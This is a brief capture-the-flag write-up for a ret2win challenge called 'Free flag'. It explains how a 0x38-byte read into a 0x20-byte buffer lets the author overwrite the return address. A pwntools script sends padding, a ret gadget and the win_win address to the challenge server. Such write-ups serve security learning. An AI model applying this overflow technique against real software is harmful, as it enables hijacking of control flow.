Free flag

Simple ret2win exploit.

The binary calls read on a buffer at rbp-0x20 and reads 0x38 bytes into it.

That leaves 16 bytes past the saved RBP, i.e. the return address plus one more 8-byte slot.

We simply send 0x28 junk bytes, then the address of a ret gadget, then the address of win_win (win_win is a function that executes cat flag.txt, while the ret gadget is only there for stack alignment).

For some reason I had to open an interactive session right when I connected to the server and hit Ctrl-C so that the exploit continued, in order for it to work...

```python
from pwn import *

e = ELF("./chall")

# 0x20 bytes of buffer + 8 bytes of saved RBP before the return address
NUM_TO_RET = 0x20 + 8
padding = b'A' * NUM_TO_RET

retgadget = 0x00000000004005ae  # ret, used only to realign the stack

# padding + ret gadget + win_win = 0x38 bytes, exactly what read() accepts
payload = padding + p64(retgadget) + p64(e.symbols['win_win'])

#p = e.process()
p = remote('europe.pwn.zh3r0.ml', 3456)
p.interactive()  # connect, then Ctrl-C to continue
p.sendline(payload)
p.interactive()
```
